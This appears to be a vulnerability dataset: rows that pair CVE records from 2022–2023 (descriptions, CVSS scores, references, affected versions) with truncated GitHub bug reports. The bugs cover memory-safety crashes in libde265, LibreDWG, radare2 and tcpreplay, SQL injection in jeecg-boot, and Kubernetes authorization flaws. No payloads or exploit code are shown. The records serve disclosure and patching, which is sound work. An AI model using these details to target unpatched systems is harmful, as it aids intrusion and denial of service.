"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/383"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/strukturag/libde265/issues/383 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function ff_hevc_put_weighted_pred_avg_8_sse at sse-motion.cc:254
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <dirk.farin@gmail.com>
Date: Sat Jan 28 15:03:34 2023 +0100
... | NULL Pointer Dereference in function ff_hevc_put_weighted_pred_avg_8_sse at sse-motion.cc:254 | https://api.github.com/repos/strukturag/libde265/issues/383/comments | 2 | 2023-01-29T08:15:05Z | 2023-03-04T07:42:17Z | https://github.com/strukturag/libde265/issues/383 | 1,561,180,747 | 383 |
CVE-2023-25221 | 2023-03-01T15:15:11.803 | Libde265 v1.0.10 was discovered to contain a heap-buffer-overflow vulnerability in the derive_spatial_luma_vector_prediction function in motion.cc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/388"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/strukturag/libde265/issues/388 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
heap-buffer-overflow in function derive_spatial_luma_vector_prediction at motion.cc:1894
# Version
```
git log
commit bfb6de155f9fb015d2904cb4ef07809f17995276 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <dirk.farin@gmail.com>
Date: Sun Jan 29 12:20:48 2023 +0100
```
... | heap-buffer-overflow in function derive_spatial_luma_vector_prediction at motion.cc:1894 | https://api.github.com/repos/strukturag/libde265/issues/388/comments | 2 | 2023-01-30T00:57:44Z | 2023-03-04T07:42:32Z | https://github.com/strukturag/libde265/issues/388 | 1,561,547,743 | 388 |
CVE-2023-25222 | 2023-03-01T15:15:11.860 | A heap-based buffer overflow vulnerability exits in GNU LibreDWG v0.12.5 via the bit_read_RC function at bits.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/615"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*",
"matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/LibreDWG/libredwg/issues/615 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | # Description
heap-buffer-overflow in function bit_read_RC at bits.c:320
# Version
```
git log
commit 3c90dc6641e11e486666940d7f354d2df54503d6 (HEAD -> master, tag: 0.12.5.5010, origin/master, origin/HEAD)
Author: Michal Josef Špaček <michal.josef.spacek@gmail.com>
Date: Fri Jan 27 18:50:08 2023 +0100
... | heap-buffer-overflow in function bit_read_RC at bits.c:320 | https://api.github.com/repos/LibreDWG/libredwg/issues/615/comments | 1 | 2023-01-30T08:00:12Z | 2023-04-29T20:50:44Z | https://github.com/LibreDWG/libredwg/issues/615 | 1,561,928,009 | 615 |
CVE-2022-3162 | 2023-03-01T19:15:25.457 | Users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a different type in the same API group without authorization. Clusters are impacted by this vulnerability if all of the following are true: 1. There are 2+ CustomResourceDefinitions sharing the same API gr... | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"inte... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/113756"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://groups.go... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1780A92B-C6FB-410B-8374-88D1D296816A",
"versionEndExcluding": null,
"versionEndIncluding": "1.22.15",
"versionStar... | https://github.com/kubernetes/kubernetes/issues/113756 | [
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"kubernetes",
"kubernetes"
] | CVSS Rating: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
A security issue was discovered in Kubernetes where users authorized to list or watch one type of namespaced custom resource cluster-wide can read custom resources of a ... | CVE-2022-3162: Unauthorized read of Custom Resources | https://api.github.com/repos/kubernetes/kubernetes/issues/113756/comments | 17 | 2022-11-08T21:33:07Z | 2022-12-08T03:40:09Z | https://github.com/kubernetes/kubernetes/issues/113756 | 1,440,934,711 | 113,756 |
CVE-2022-3294 | 2023-03-01T19:15:25.570 | Users may have access to secure endpoints in the control plane network. Kubernetes clusters are only affected if an untrusted user can modify Node objects and send proxy requests to them. Kubernetes supports node proxying, which allows clients of kube-apiserver to access endpoints of a Kubelet to establish connections ... | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/kubernetes/kubernetes/issues/113757"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://groups.google... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38E275C4-8711-435F-85D8-073116D467CF",
"versionEndExcluding": "1.22.16",
"versionEndIncluding": null,
"versionStar... | https://github.com/kubernetes/kubernetes/issues/113757 | [
"Patch",
"Vendor Advisory"
] | github.com | [
"kubernetes",
"kubernetes"
] | CVSS Rating: [CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)
A security issue was discovered in Kubernetes where users may have access to secure endpoints in the control plane network. Kubernetes clusters are only affected if an u... | CVE-2022-3294: Node address isn't always verified when proxying | https://api.github.com/repos/kubernetes/kubernetes/issues/113757/comments | 2 | 2022-11-08T21:33:26Z | 2023-04-27T08:27:18Z | https://github.com/kubernetes/kubernetes/issues/113757 | 1,440,935,103 | 113,757 |
CVE-2022-47664 | 2023-03-03T15:15:10.887 | Libde265 1.0.9 is vulnerable to Buffer Overflow in ff_hevc_put_hevc_qpel_pixels_8_sse | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/368"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.9:*:*:*:*:*:*:*",
"matchCriteriaId": "8186C657-3009-4756-B2AC-531BD7926074",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | https://github.com/strukturag/libde265/issues/368 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
heap-buffer-overflow (libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*)
# Version info
```
dec265 v1.0.9
--------------
usage: dec265 [options] videofile.bin
The video file must be a raw bitstream,... | heap-buffer-overflow (libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*) | https://api.github.com/repos/strukturag/libde265/issues/368/comments | 7 | 2022-12-18T10:37:01Z | 2023-03-06T17:51:27Z | https://github.com/strukturag/libde265/issues/368 | 1,501,854,902 | 368 |
CVE-2022-47665 | 2023-03-03T15:15:10.960 | Libde265 1.0.9 has a heap buffer overflow vulnerability in de265_image::set_SliceAddrRS(int, int, int) | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrit... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/369"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.9:*:*:*:*:*:*:*",
"matchCriteriaId": "8186C657-3009-4756-B2AC-531BD7926074",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | https://github.com/strukturag/libde265/issues/369 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int)
# Version info
```
dec265 v1.0.9
--------------
usage: dec265 [options] videofile.bin
The video file must be a raw bitstream, or a stream with NAL units (option -n).
options... | heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int) | https://api.github.com/repos/strukturag/libde265/issues/369/comments | 5 | 2022-12-18T10:37:03Z | 2023-03-06T17:51:06Z | https://github.com/strukturag/libde265/issues/369 | 1,501,854,985 | 369 |
CVE-2023-24789 | 2023-03-06T16:15:10.187 | jeecg-boot v3.4.4 was discovered to contain an authenticated SQL injection vulnerability via the building block report component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/4511"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg:3.4.4:*:*:*:*:*:*:*",
"matchCriteriaId": "83D5D7DD-38EF-48F6-8C18-F75891A91B66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | https://github.com/jeecgboot/jeecg-boot/issues/4511 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | Use the system default account password to log in to the system.
In the visual design menu - report design, see Figure 1 for details.
<img width="1512" alt="截屏2023-01-29 22 01 08" src="https://user-images.githubusercontent.com/32299945/215331278-68f86a40-1199-463a-b0f0-5441746c7eb1.png">
Then click New Report, see F... | There is a sql injection vulnerability in the jeecg 3.4.4 building block report | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4511/comments | 3 | 2023-01-29T14:16:41Z | 2023-11-01T01:16:34Z | https://github.com/jeecgboot/JeecgBoot/issues/4511 | 1,561,308,445 | 4,511 |
CVE-2023-27114 | 2023-03-10T02:15:58.403 | radare2 v5.8.3 was discovered to contain a segmentation fault via the component wasm_dis at p/wasm/wasm.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/radareorg/radare2/commit/a15067a8eaa836bcc24b0882712c14d1baa66509"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/radareorg/radare2/issues/21363"
}... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:radare:radare2:5.8.3:*:*:*:*:*:*:*",
"matchCriteriaId": "51E5C30E-2343-42D6-B6FA-C50BCFA549AB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/radareorg/radare2/issues/21363 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"radareorg",
"radare2"
] |
## Description
When parsing the wasm file with r2, using the `pd` command may result in a segmentation fault, because `NULL` was incorrectly passed to `strdup`.
## Environment
```sh
# date
Mon Feb 20 02:38:13 AKST 2023
# r2 -v
radare2 5.8.3 0 @ linux-x86-64 git.5.8.3
commit: 5.8.3 build: 2023-02-16__23:25... | Segmentation fault in wasm_dis at p/wasm/wasm.c:1112 | https://api.github.com/repos/radareorg/radare2/issues/21363/comments | 1 | 2023-02-20T11:48:06Z | 2023-02-20T12:30:07Z | https://github.com/radareorg/radare2/issues/21363 | 1,591,704,755 | 21,363 |
CVE-2023-27102 | 2023-03-15T15:15:09.617 | Libde265 v1.0.11 was discovered to contain a segmentation violation via the function decoder_context::process_slice_segment_header at decctx.cc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"inte... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/strukturag/libde265/issues/393"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/11/msg000... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.11:*:*:*:*:*:*:*",
"matchCriteriaId": "75BAF096-8BC3-4430-930C-8F3E6266C21D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/strukturag/libde265/issues/393 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"strukturag",
"libde265"
] | ### Desctiption
A SEGV has occurred when running program dec265
NULL Pointer Dereference in function decoder_context::process_slice_segment_header at decctx.cc:2007:20
### Version
```
dec265 v1.0.11
git log
commit fef32a7761993702c699dfbe3699e44374eb44b5 (HEAD -> master, origin/master, origin/HEAD)
Merge: 3a... | SEGV:occured in function decoder_context::process_slice_segment_header at decctx.cc:2007:20 | https://api.github.com/repos/strukturag/libde265/issues/393/comments | 2 | 2023-02-20T13:07:39Z | 2023-06-13T13:34:07Z | https://github.com/strukturag/libde265/issues/393 | 1,591,846,415 | 393 |
CVE-2023-27103 | 2023-03-15T15:15:09.670 | Libde265 v1.0.11 was discovered to contain a heap buffer overflow via the function derive_collocated_motion_vectors at motion.cc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/strukturag/libde265/issues/394"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2023/11/msg000... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.11:*:*:*:*:*:*:*",
"matchCriteriaId": "75BAF096-8BC3-4430-930C-8F3E6266C21D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/strukturag/libde265/issues/394 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"strukturag",
"libde265"
] | ### Desctiption
A heap-buffer-overflow has occurred when running program dec265 in function derive_collocated_motion_vectors at motion.cc:1259:41
### Version
```
dec265 v1.0.11
git log
commit fef32a7761993702c699dfbe3699e44374eb44b5 (HEAD -> master, origin/master, origin/HEAD)
Merge: 3aea5a45 c2b60f1c
Author... | A heap-buffer-overflow has occurred when running program dec265 in function derive_collocated_motion_vectors at motion.cc | https://api.github.com/repos/strukturag/libde265/issues/394/comments | 3 | 2023-02-22T03:28:35Z | 2023-04-16T20:29:41Z | https://github.com/strukturag/libde265/issues/394 | 1,594,397,865 | 394 |
CVE-2023-27783 | 2023-03-16T15:15:10.717 | An issue found in TCPreplay tcprewrite v.4.4.3 allows a remote attacker to cause a denial of service via the tcpedit_dlt_cleanup function at plugins/dlt_plugins.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/780"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcprepla... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/appneta/tcpreplay/issues/780 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a reachable assertion in `tcpedit_dlt_cleanup()` when when the user uses `tcprewrite` to open a crafted pcap file in `DLT_JUNIPER_ETHER` mode.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay source code and compile it.
```
$ ./configure
$ make
```
... | [Bug] Reachable assertion in tcpedit_dlt_cleanup() at plugins/dlt_plugins.c | https://api.github.com/repos/appneta/tcpreplay/issues/780/comments | 5 | 2023-03-01T03:10:46Z | 2023-06-12T11:10:36Z | https://github.com/appneta/tcpreplay/issues/780 | 1,604,155,785 | 780 |
CVE-2023-27784 | 2023-03-16T15:15:10.767 | An issue found in TCPReplay v.4.4.3 allows a remote attacker to cause a denial of service via the read_hexstring function at the utils.c:309 endpoint. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/787"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedor... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/appneta/tcpreplay/issues/787 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a NULL Pointer Dereference in `read_hexstring()` when the user passes empty user dlink string to `tcprewrite` with option `--user-dlink` when the program process the pcap file whose data link type is DLT_USER0.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay ... | [Bug] NULL Pointer Dereference in read_hexstring() at utils.c:309 | https://api.github.com/repos/appneta/tcpreplay/issues/787/comments | 1 | 2023-03-01T14:29:21Z | 2023-06-05T02:12:40Z | https://github.com/appneta/tcpreplay/issues/787 | 1,605,081,875 | 787 |
CVE-2023-27785 | 2023-03-16T15:15:10.823 | An issue found in TCPreplay TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the parse endpoints function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/785"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedor... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/appneta/tcpreplay/issues/785 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a NULL Pointer Dereference in `parse_endpoints()` when the user passes empty endpoints string to `tcprewrite` with option `--endpoints`.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay source code and compile it.
```
$ ./configure
$ make
```
2. G... | [Bug] NULL Pointer Dereference in parse_endpoints() at cidr.c:367 | https://api.github.com/repos/appneta/tcpreplay/issues/785/comments | 1 | 2023-03-01T13:05:12Z | 2023-06-05T02:11:48Z | https://github.com/appneta/tcpreplay/issues/785 | 1,604,942,692 | 785 |
CVE-2023-27786 | 2023-03-16T15:15:10.877 | An issue found in TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the macinstring function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/782"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcprepla... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/appneta/tcpreplay/issues/782 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a NULL Pointer Dereference in `macinstring()` when the user passes empty mac string to `tcpprep` in Source MAC split mode.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay source code and compile it.
```
$ ./configure
$ make
```
2. Run Command `$ ./... | [Bug] NULL Pointer Dereference in macinstring() at mac.c:120 | https://api.github.com/repos/appneta/tcpreplay/issues/782/comments | 2 | 2023-03-01T08:19:59Z | 2023-06-05T02:10:12Z | https://github.com/appneta/tcpreplay/issues/782 | 1,604,494,155 | 782 |
CVE-2023-27787 | 2023-03-16T15:15:10.940 | An issue found in TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the parse_list function at the list.c:81 endpoint. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/788"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedor... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/appneta/tcpreplay/issues/788 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a NULL Pointer Dereference in `parse_list()` when the user passes specific size (i.e., 2) of include string to `tcpprep` with option `--include`.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay source code and compile it.
```
$ ./configure
$ make
... | [Bug] NULL Pointer Dereference in parse_list() at list.c:81 | https://api.github.com/repos/appneta/tcpreplay/issues/788/comments | 1 | 2023-03-02T01:58:00Z | 2023-06-05T02:13:05Z | https://github.com/appneta/tcpreplay/issues/788 | 1,605,978,257 | 788 |
CVE-2023-27788 | 2023-03-16T15:15:11.000 | An issue found in TCPrewrite v.4.4.3 allows a remote attacker to cause a denial of service via the ports2PORT function at the portmap.c:69 endpoint. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/786"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedor... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
"matchCriteriaId": "7272A798-456E-43CC-A8D2-33FF2AE16FF7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/appneta/tcpreplay/issues/786 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
There is a reachable assertion in `ports2PORT()` when the user passes empty portmap string to `tcprewrite` with option `--portmap`.
**To Reproduce**
Steps to reproduce the behavior:
1. Get the Tcpreplay source code and compile it.
```
$ ./configure
$ make
```
2. Run Command `$ ... | [Bug] Reachable assertion in ports2PORT() at portmap.c:69 | https://api.github.com/repos/appneta/tcpreplay/issues/786/comments | 1 | 2023-03-01T13:11:58Z | 2023-06-05T02:12:13Z | https://github.com/appneta/tcpreplay/issues/786 | 1,604,953,701 | 786 |
CVE-2023-27789 | 2023-03-16T15:15:11.057 | An issue found in TCPprep v.4.4.3 allows a remote attacker to cause a denial of service via the cidr2cidr function at the cidr.c:178 endpoint. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcpreplay/issues/784"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/appneta/tcprepla... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.3:*:*:*:*:*:*:*",
